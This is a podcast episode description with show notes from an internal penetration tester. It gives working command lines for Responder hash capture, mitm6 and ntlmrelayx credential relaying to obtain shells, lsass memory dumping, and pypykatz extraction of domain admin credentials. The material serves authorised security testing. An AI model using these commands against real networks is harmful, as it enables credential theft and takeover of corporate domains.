7MS #423: Tales of Internal Pentest Pwnage - Part 18 - a podcast by Brian Johnson
from 2020-07-15T14:54:54
This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:
Responder.py -i eth0 -rPv
is AWESOME. It can make the network rain hashes like manna from heaven!- Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down.
- Testing for MS14-025 is easy with this site.
- mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this:
smb://CORP\Administrator@192.168.195.2 smb://CORP\Administrator@192.168.195.3 smb://CORP\brian.admin@192.168.195.7 192.168.195.7 192.168.195.10
Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support
. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin
-
I ran into a weird issue with CrackMapExec where the
--local-auth
flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ! -
Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done.
-
Wanna spin up a quick SMB share from your Kali box? Try
smbserver.py -smb2support share /share
-
Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:
pip3 install pypykatz sudo pypykatz lsa minidump lsass.dmp > lsass.txt
Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!
Further episodes of 7 Minute Security
Further podcasts by Brian Johnson
Website of Brian Johnson